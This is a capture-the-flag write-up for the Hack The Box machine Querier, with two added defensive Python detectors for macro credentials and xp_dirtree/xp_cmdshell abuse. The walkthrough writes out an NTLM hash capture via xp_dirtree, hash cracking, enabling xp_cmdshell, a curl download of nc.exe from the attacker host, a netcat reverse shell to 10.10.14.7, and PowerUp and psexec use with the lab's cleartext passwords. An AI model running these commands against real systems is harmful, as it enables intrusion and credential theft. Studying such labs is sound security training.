Hackthebox - Querier
Windows

Nmap
SMB
Let's try to list the shares
Let's try to connect to the Reports share. It works.
We get an Excel file (.xlsm) containing a macro. Searching online, we find an article by Nairuz Abulhul that mentions olevba. Using it:
olevba Currency\ Volume\ Report.xlsm
we are able to find the password for the SQL server inside the macro's connection string:
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
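The macro above is the kind of artefact a defender can hunt for before it reaches a share: an Office file that carries a VBA project, and VBA source whose connection string embeds a SQL password instead of using integrated authentication. The following Python is an added audit helper, not code from this write-up or from olevba. It checks an OOXML container for a vbaProject.bin part and scans extracted VBA source (what olevba prints) for ODBC-style connection strings with a Pwd= or Password= key, reporting the server and user but redacting the secret. The workbook bytes and the VBA text it uses are constructed samples; the host name and password in them are placeholders.

```python
"""Audit helper (added example, not from the original write-up): flag Office
files that carry a VBA project, and flag connection strings in extracted VBA
source that embed a password. All sample inputs below are constructed."""
import io
import re
import zipfile

# Parts that mark a VBA project inside an OOXML (.xlsm/.docm/.pptm) container.
VBA_PARTS = ("xl/vbaProject.bin", "word/vbaProject.bin", "ppt/vbaProject.bin")

# ODBC/OLE DB style connection strings: quoted "Key=Value;Key=Value" runs.
CONN_STR_RE = re.compile(r'"((?:[A-Za-z_ ]+=[^;"]*;?)+)"')
SECRET_KEYS = {"pwd", "password"}


def has_vba_project(ooxml_bytes: bytes) -> bool:
    """Return True if the OOXML zip contains a vbaProject.bin part."""
    try:
        with zipfile.ZipFile(io.BytesIO(ooxml_bytes)) as zf:
            names = set(zf.namelist())
    except zipfile.BadZipFile:
        return False
    return any(part in names for part in VBA_PARTS)


def parse_connection_string(conn: str) -> dict:
    """Split 'Key=Value;Key=Value' into a dict with lower-cased keys."""
    pairs = {}
    for item in conn.split(";"):
        if "=" in item:
            key, value = item.split("=", 1)
            pairs[key.strip().lower()] = value.strip()
    return pairs


def find_embedded_credentials(vba_source: str) -> list:
    """One finding per connection string that carries a password.
    The password value is redacted; only its length is reported."""
    findings = []
    for match in CONN_STR_RE.finditer(vba_source):
        pairs = parse_connection_string(match.group(1))
        secret = next((k for k in SECRET_KEYS if pairs.get(k)), None)
        if secret is None:
            continue
        findings.append({
            "server": pairs.get("server", "?"),
            "user": pairs.get("uid") or pairs.get("user id", "?"),
            "trusted_connection": pairs.get("trusted_connection", "").lower() == "yes",
            "password": "<redacted:%d chars>" % len(pairs[secret]),
        })
    return findings


def build_sample_xlsm(with_macro: bool) -> bytes:
    """Constructed minimal OOXML container for demonstration (not a real workbook)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        if with_macro:
            zf.writestr("xl/vbaProject.bin", b"\x00constructed-placeholder\x00")
    return buf.getvalue()


# Constructed VBA source shaped like the macro olevba recovered in the write-up;
# EXAMPLEHOST and the password are placeholders, not values from the box.
SAMPLE_VBA = (
    'Set conn = CreateObject("ADODB.Connection")\n'
    'conn.ConnectionString = "Driver={SQL Server};Server=EXAMPLEHOST;'
    'Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=NotTheRealPassword1"\n'
    'conn.Open\n'
)

if __name__ == "__main__":
    print("macro present:", has_vba_project(build_sample_xlsm(True)))
    for finding in find_embedded_credentials(SAMPLE_VBA):
        print(finding)
```

In practice you would feed has_vba_project() the raw bytes of files found on a share and find_embedded_credentials() the text olevba extracts; a hit with trusted_connection False and a non-empty password is exactly the case on this box, and the fix is a service account with integrated authentication rather than a password baked into the workbook.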
MS-SQL Server
We can connect with mssqlclient.py from impacket.
Note: I was struggling with the impacket command; it turns out that in order to work, the password needs to have not double quotes or no quotes BUT single quotes (seems to be because of the dollar sign in the pass).
python3 /opt/impacket/examples/mssqlclient.py QUERIER/reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth
We get a shell this way.
Here is an interesting article from HackTricks on MSSQL.
We can list the tables:
select * from volume.INFORMATION_SCHEMA.TABLES;
We can list the users:
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
We do not have enough rights to create a user. Trying to dump the login password hashes:
SELECT CONCAT(sp.name, '***', master.sys.fn_varbintohexstr(sl.password_hash)) from master.sys.server_principals sp LEFT JOIN sys.sql_logins sl ON sp.principal_id = sl.principal_id
We can check the MS SQL version:
SELECT @@VERSION AS 'SQL Server Version';
I tried this for command execution but it is not working.
Check if we have other databases:
select name from sys.databases;
Check our user's permissions:
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
OK, we do not have many permissions; we should check another way.
We can try something like this from Mark Mo's blog.
Let's create a directory on our attacking machine:
mkdir querysmb
Let's launch an SMB server:
python3 /opt/impacket/examples/smbserver.py -smb2support myshare querysmb
Now we just need to run the exec command to drop the hash:
exec xp_dirtree '\\10.10.14.7\myshare\'
And it works.

Now let's copy the hash into a text file and try to crack it using hashcat:
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
Let's try to connect to SQL again, but with this user.

Let's check our permissions with this user:
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
We have many more than previously.
It seems we could even try xp_cmdshell again. Let's try to enable it:
enable_xp_cmdshell
If we issue our previous command again, it works.
We can get the user flag:
EXEC master..xp_CMDShell 'type C:\Users\mssql-svc\Desktop\user.txt';
Let's get nc.exe onto the target. We serve it over HTTP from our machine:
python3 -m http.server 80
EXEC master..xp_CMDShell 'curl.exe -o C:\Users\mssql-svc\Desktop\nc.exe http://10.10.14.7/nc.exe'
We get it. We check that it worked:
EXEC master..xp_CMDShell 'dir C:\Users\mssql-svc\Desktop\'
We set a listener:
rlwrap nc -lvp 4444
EXEC master..xp_CMDShell 'C:\Users\mssql-svc\Desktop\nc.exe -e cmd.exe 10.10.14.7 4444'
We get a shell.
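Both of the SQL-side steps used on this box, the xp_dirtree call to a UNC path (which makes the SQL service account authenticate to the share the attacker is hosting) and xp_cmdshell being re-enabled and then executed, leave statement text in SQL Server Audit if statement-level auditing is on. The following Python is an added detection example, not code from this write-up; it scans audit records exported in a constructed time|principal|client_ip|statement format, flags file-system extended procedures whose UNC host is not an allow-listed file server, and flags sp_configure enabling xp_cmdshell separately from xp_cmdshell executions. The allow-list, the log lines and the 192.0.2.7 address are constructed assumptions.

```python
"""Detection example (added here, not from the original write-up): scan SQL
Server Audit statement records for a UNC path handed to a file-system extended
procedure and for xp_cmdshell being enabled or executed. Log lines constructed."""
import re

# Extended procedures that accept a path and will follow a UNC to a remote share.
UNC_PROCS = ("xp_dirtree", "xp_fileexist", "xp_subdirs", "xp_getfiledetails")
UNC_RE = re.compile(r"\\\\([A-Za-z0-9_.-]+)\\")
ENABLE_CMDSHELL_RE = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.IGNORECASE)
CMDSHELL_RE = re.compile(r"\bxp_cmdshell\b", re.IGNORECASE)

# Assumption: file servers the SQL service is legitimately allowed to reach.
TRUSTED_UNC_HOSTS = {"fileserver01", "fileserver01.corp.example"}


def parse_audit_line(line: str) -> dict:
    """Constructed export format: time|server_principal|client_ip|statement."""
    time, principal, client_ip, statement = line.split("|", 3)
    return {"time": time, "principal": principal,
            "client_ip": client_ip, "statement": statement.strip()}


def analyse_statement(rec: dict) -> list:
    """Return zero or more alert dicts for one audit record."""
    stmt = rec["statement"]
    lower = stmt.lower()
    hits = []
    if any(proc in lower for proc in UNC_PROCS):
        # Any UNC host outside the allow-list is an outbound-auth candidate.
        for host in UNC_RE.findall(stmt):
            if host.lower() not in TRUSTED_UNC_HOSTS:
                hits.append(("HIGH", "unc_to_untrusted_host", host))
    if ENABLE_CMDSHELL_RE.search(stmt):
        hits.append(("HIGH", "xp_cmdshell_enabled", rec["principal"]))
    elif CMDSHELL_RE.search(stmt) and "sp_configure" not in lower:
        hits.append(("CRITICAL", "xp_cmdshell_executed", rec["principal"]))
    return [{"severity": sev, "rule": rule, "detail": detail,
             "principal": rec["principal"], "client_ip": rec["client_ip"],
             "time": rec["time"]} for sev, rule, detail in hits]


def scan_audit(text: str) -> list:
    """Run analyse_statement over every non-empty line of an export."""
    alerts = []
    for line in text.strip().splitlines():
        if line.strip():
            alerts.extend(analyse_statement(parse_audit_line(line)))
    return alerts


# Constructed audit export: one benign query, one UNC to a trusted server, one
# UNC to an unknown host, then xp_cmdshell being enabled and executed.
SAMPLE_AUDIT = r"""
2019-03-02T10:14:05|DOMAIN\svc_reports|10.0.0.21|SELECT * FROM volume.INFORMATION_SCHEMA.TABLES;
2019-03-02T10:15:40|DOMAIN\svc_reports|10.0.0.21|exec xp_dirtree '\\fileserver01\exports\'
2019-03-02T10:16:02|DOMAIN\svc_reports|10.0.0.21|exec xp_dirtree '\\192.0.2.7\myshare\'
2019-03-02T10:20:11|DOMAIN\svc_backup|10.0.0.21|EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
2019-03-02T10:20:45|DOMAIN\svc_backup|10.0.0.21|EXEC master..xp_cmdshell 'whoami'
"""

if __name__ == "__main__":
    for alert in scan_audit(SAMPLE_AUDIT):
        print("{severity:8} {rule:24} {principal} -> {detail}".format(**alert))
```

The UNC rule is the one worth tuning: xp_dirtree against an internal file server is routine in some reporting jobs, so the allow-list does the work, and the same signal is visible at the network layer as SMB (TCP 445) leaving the SQL host towards an address that is not a file server, which an egress rule can simply block. The xp_cmdshell rules need no tuning; on a server where the option is meant to stay off, any enable is an incident.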

Privesc
systeminfo
Let's use wes (WES-NG) on the saved systeminfo output to see what exploit we could use:
python3 /opt/wesng/wes.py --color sysinfo.txt | grep -B 3 -A 5 "Privilege Vulnerability"
I will grep a few lines before and after to have the whole CVE info. I also want to try PowerUp before using any kernel exploit.
curl.exe -o C:\Users\mssql-svc\Desktop\powerup.ps1 http://10.10.14.7/PowerUp.ps1
powershell -ep bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks | Out-String -Width 4096
We have a cleartext password for the Administrator:
MyUnclesAreMarioAndLuigi!!1!
python3 /opt/impacket/examples/psexec.py Administrator:'MyUnclesAreMarioAndLuigi!!1!'@10.10.10.125
We have an admin shell; we can grab the final flag!
type C:\Users\Administrator\Desktop\root.txt